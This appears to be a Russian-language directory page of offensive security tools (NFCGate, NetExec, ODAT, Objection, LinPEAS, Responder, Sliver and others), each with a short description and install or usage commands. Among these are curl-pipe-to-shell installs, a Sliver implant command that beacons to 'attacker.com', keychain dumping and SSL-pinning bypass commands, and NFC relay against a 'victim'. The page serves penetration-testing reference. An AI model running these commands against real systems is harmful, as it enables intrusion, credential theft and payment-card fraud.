Exploitation

56 инструментов

NFCGate

v2.6.1
Exploitation

Android-приложение для relay-атак на NFC. Перехватывает NFC-трафик между картой и терминалом, ретранслирует через IP-сеть на второе устройство. Поддерживает: capture, replay, relay, клонирование Mifare Classic. Позволяет обходить RFID-доступ на …

# Установить APK на 2 Android-устройства с NFC: https://github.com/nfcgate/nfcgate/releases # Одно — у жертвы (capture/relay), второе — у терминала (relay/replay)

NetExec

v1.5.1
Exploitation

Швейцарский нож для аудита и эксплуатации сетей Windows/Active Directory. Форк и преемник CrackMapExec. Поддерживает протоколы: SMB, WinRM, LDAP, RDP, SSH, MSSQL, FTP. Основные возможности: • Проверка учётных данных …

# pip pip install netexec # Из исходников git clone https://github.com/Pennyw0rth/NetExec cd NetExec && pip install -e . # Pipx (изолированная установка) pipx install netexec

NoSQLMap

v0.5
Exploitation

Инструмент автоматизации атак на NoSQL-базы данных. Поддерживает MongoDB, CouchDB, Redis, Cassandra. Выполняет: injection через HTTP-параметры, извлечение данных без аутентификации, перебор учётных данных, эксплуатацию мисконфигураций (открытый MongoDB без авторизации).

git clone https://github.com/codingo/NoSQLMap cd NoSQLMap && pip install -r requirements.txt python3 nosqlmap.py

ODAT

v5.1.1
Exploitation

Oracle Database Attacking Tool — специализированный инструмент пентеста Oracle DB. Функции: перебор SID и учётных данных, выполнение OS-команд через Java/DBMS_SCHEDULER/extproc, чтение/запись файлов через UTL_FILE, повышение привилегий, извлечение хешей …

git clone https://github.com/quentinhardy/odat cd odat && pip install -r requirements.txt # Требует Oracle Instant Client python3 odat.py all -s 192.168.1.10 -p 1521 -d ORCL

OWASP ZAP

v2.17.0
Exploitation ★ featured

Один из самых популярных open source сканеров безопасности веб-приложений. Поддерживает активное/пассивное сканирование, перехват трафика (proxy), fuzzing, spider, автоматизацию через REST API и скрипты. Подходит как для ручного тестирования, …

# Docker: docker run -u zap -p 8080:8080 zaproxy/zap-stable zap.sh -daemon -host 0.0.0.0 -port 8080 # Snap: sudo snap install zaproxy --classic # Jar (любая ОС): wget https://github.com/zaproxy/zaproxy/releases/latest

Objection

v1.12.5
Exploitation

Инструмент для динамического анализа мобильных приложений без jailbreak/root, построенный поверх Frida. iOS и Android: обход SSL pinning, обход root-detection, дамп памяти, хуки на методы в реальном времени. Применяется …

pip3 install objection # Frida-server должен работать на устройстве. # Запуск: objection -g com.target.app explore # Обход SSL pinning: android sslpinning disable ios sslpinning disable # Обход root-detection: android root disable # Dump keychain (iOS): ios keychain dump

PEASS-ng (LinPEAS)

v20260701-584b0e93
Exploitation

Набор скриптов для поиска путей повышения привилегий. LinPEAS — для Linux/macOS, WinPEAS — для Windows. Автоматически проверяет сотни векторов: • SUID/SGID бинарники • Cron jobs с небезопасными путями …

# LinPEAS — запуск напрямую с GitHub (без сохранения на диск) curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh # Скачать и запустить wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh && ./linpeas.sh # WinPEAS (.exe или .bat) # https://github.com/peass-ng/PEASS-ng/releases # С цветовым выводом и записью в файл ./linpeas.sh -a 2>&1 | tee linpeas_output.txt

Protocol Fuzzer CE

vpub-v4.3.300
Exploitation

Движок протокольного фаззинга на базе Peach Fuzzer Professional v4, открытый Offensive Security (GitLab) в 2021 году под лицензией MIT. Позволяет строить определения протоколов (PIT-файлы на XML) и автоматически …

git clone https://gitlab.com/gitlab-org/security-products/protocol-fuzzer-ce cd protocol-fuzzer-ce # Требует .NET 6 / Mono dotnet build # Запуск фаззинга по PIT-файлу (описание протокола) ./peach --pit samples/HelloWorld.xml # Документация # https://gitlab.com/gitlab-org/security-products/protocol-fuzzer-ce/-/wikis

Radare2

v6.1.8
Exploitation

Открытый фреймворк для обратной разработки и анализа бинарных файлов. Включает дизассемблер, отладчик, hex-редактор, скриптование через Python и r2lang, поддержку десятков архитектур (x86, ARM, MIPS, RISC-V и др.) и …

git clone https://github.com/radareorg/radare2 cd radare2 && sys/install.sh # Открыть бинарник r2 ./binary # Полный анализ [0x00000000]> aaa [0x00000000]> pdf @ main

Responder

v3.2.2.0
Exploitation

Инструмент для атак на протоколы LLMNR, NBT-NS и MDNS во внутренних сетях. Поднимает поддельные сервисы (SMB, HTTP, LDAP, FTP, MSSQL и др.) и перехватывает NTLMv1/v2 хеши при обращении …

# Kali Linux (предустановлен) responder -h # Из исходников git clone https://github.com/lgandx/Responder cd Responder python Responder.py -I eth0 -rdwv # Зависимости pip install netifaces
Блог

Semgrep

v1.171.0
Exploitation

Молниеносный статический анализатор кода с человекочитаемым синтаксисом правил (похож на сам код, а не на regex): находит реальные уязвимости и антипаттерны в десятках языков за секунды на кодовых …

pip install semgrep semgrep --config auto /path/to/code semgrep --config "p/security-audit" .

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell